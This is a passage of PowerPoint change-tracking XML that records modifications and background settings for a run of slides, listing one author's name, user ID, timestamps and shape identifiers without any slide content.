            <pc:sldMk cId="1452016038" sldId="615"/>
            <ac:spMk id="5" creationId="{0D1C19D5-D6CC-452F-973F-6952CFD78A20}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2379504392" sldId="616"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2379504392" sldId="616"/>
            <ac:spMk id="2" creationId="{8A8C2946-EEB3-4ABE-9AB5-79EAFB346E1F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2379504392" sldId="616"/>
            <ac:spMk id="3" creationId="{6E90862C-511C-4C2A-8D71-D27A152358DE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1242305289" sldId="617"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1242305289" sldId="617"/>
            <ac:spMk id="2" creationId="{604E6839-6031-45CF-B04E-0A611ECDF36D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1242305289" sldId="617"/>
            <ac:spMk id="6" creationId="{BE931D6C-DC8B-4B84-A71A-5188E073700A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2475106691" sldId="618"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2475106691" sldId="618"/>
            <ac:spMk id="2" creationId="{96A8E8B6-EBB2-4531-A258-25496A1FAED3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2475106691" sldId="618"/>
            <ac:spMk id="4" creationId="{CA5EFB90-E782-43A1-AB09-C96E9B8A70DE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3344623456" sldId="619"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3344623456" sldId="619"/>
            <ac:spMk id="2" creationId="{7D600469-BE1B-442F-BCFB-6BE4EEE8DC58}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3344623456" sldId="619"/>
            <ac:spMk id="3" creationId="{576F517B-8C22-4463-ABB9-055FA99D4D00}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="432405479" sldId="620"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="432405479" sldId="620"/>
            <ac:spMk id="2" creationId="{66061F65-5041-47D1-B7C1-E3C46E6A46EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="432405479" sldId="620"/>
            <ac:spMk id="3" creationId="{8BB5A78E-D494-4C45-A2FC-9D644A06B51F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="479966137" sldId="621"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="479966137" sldId="621"/>
            <ac:spMk id="2" creationId="{C5AC02F7-9025-485F-8347-64D461D9510B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="479966137" sldId="621"/>
            <ac:spMk id="3" creationId="{9AACCA85-44E4-4529-93A9-51BC067B6CD2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="832286915" sldId="622"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="832286915" sldId="622"/>
            <ac:spMk id="2" creationId="{C0506BDB-AE08-4157-BA7C-1C8C4CBDFBD4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="832286915" sldId="622"/>
            <ac:spMk id="3" creationId="{AB0D5AC7-DF52-4FE9-825F-2AC7118950F7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2916274487" sldId="624"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2916274487" sldId="624"/>
            <ac:spMk id="2" creationId="{DAA453A5-4DD7-4F2C-B3F4-43AE0B1DD8C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2916274487" sldId="624"/>
            <ac:spMk id="4" creationId="{14A728CD-B7F4-4882-A454-5082EB58B184}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4278225063" sldId="625"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4278225063" sldId="625"/>
            <ac:spMk id="2" creationId="{F8E31C96-02F2-4B39-A3D1-09E54AF6349A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2378943140" sldId="626"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2378943140" sldId="626"/>
            <ac:spMk id="3" creationId="{FD8B8001-CD78-6846-91F1-30431D512F70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2378943140" sldId="626"/>
            <ac:spMk id="4" creationId="{F0F957D6-27C0-6E42-8C05-8D1320AD1BDA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="125096300" sldId="627"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="125096300" sldId="627"/>
            <ac:spMk id="7" creationId="{CD71A5E8-8BE9-4881-BF37-B7ED4BF8EE95}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="125096300" sldId="627"/>
            <ac:spMk id="8" creationId="{1D181EA2-37FB-4BD7-92FE-84E20130845C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3545809090" sldId="628"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3545809090" sldId="628"/>
            <ac:spMk id="2" creationId="{C12E7632-0BD4-49DA-A83E-BB1A93BB31A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3545809090" sldId="628"/>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3232851630" sldId="629"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3232851630" sldId="629"/>
            <ac:spMk id="2" creationId="{450C3B07-4AAE-4F5D-A6DF-BB28272A303E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3232851630" sldId="629"/>
            <ac:spMk id="3" creationId="{4B01AACF-BB42-45F9-A64A-8363F32182F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3232851630" sldId="629"/>
            <ac:spMk id="5" creationId="{9566EF23-1DB0-4217-B255-2CC2465AC975}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3976816380" sldId="630"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3976816380" sldId="630"/>
            <ac:spMk id="2" creationId="{C12E7632-0BD4-49DA-A83E-BB1A93BB31A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3976816380" sldId="630"/>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3812464203" sldId="631"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3812464203" sldId="631"/>
            <ac:spMk id="2" creationId="{AA151BB9-37B6-4BBE-93C6-581375393878}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3812464203" sldId="631"/>
            <ac:spMk id="3" creationId="{E3EFBD19-50E2-4D84-B656-28E018604DCA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="258645525" sldId="632"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="258645525" sldId="632"/>
            <ac:spMk id="2" creationId="{795812D6-C0B6-4954-A224-3910F525D99F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="258645525" sldId="632"/>
            <ac:spMk id="3" creationId="{B45C4267-5C19-4CEA-B36B-C8BC91C7339D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3840866050" sldId="633"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3840866050" sldId="633"/>
            <ac:spMk id="2" creationId="{35538677-3E23-45B2-BCBB-5CEDE94F788C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3840866050" sldId="633"/>
            <ac:spMk id="3" creationId="{C75ED40D-013C-441B-8837-42C0C471B8C9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="727531629" sldId="634"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="727531629" sldId="634"/>
            <ac:spMk id="2" creationId="{35538677-3E23-45B2-BCBB-5CEDE94F788C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="727531629" sldId="634"/>
            <ac:spMk id="3" creationId="{C75ED40D-013C-441B-8837-42C0C471B8C9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2291252841" sldId="635"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2291252841" sldId="635"/>
            <ac:spMk id="2" creationId="{F5A99F33-C34A-490F-ADC7-5EBC797FFEE1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2291252841" sldId="635"/>
            <ac:spMk id="3" creationId="{877F4CC9-26E7-42A6-A607-46555FEF02A6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1863475517" sldId="636"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1863475517" sldId="636"/>
            <ac:spMk id="2" creationId="{C12E7632-0BD4-49DA-A83E-BB1A93BB31A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1863475517" sldId="636"/>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371468566" sldId="637"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371468566" sldId="637"/>
            <ac:spMk id="2" creationId="{E5A51831-90DF-45E7-90C3-A8F2A9DFCE43}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371468566" sldId="637"/>
            <ac:spMk id="4" creationId="{C02050B0-7F92-4F26-BABB-12C26C7FB991}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3007951881" sldId="638"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3007951881" sldId="638"/>
            <ac:spMk id="2" creationId="{06664299-8EE9-467A-9D48-F5AE40DF4164}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3007951881" sldId="638"/>
            <ac:spMk id="3" creationId="{345B2788-4D95-4B6E-BF54-F675BCA3AF31}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1775645039" sldId="639"/>
        </pc:sldMkLst>
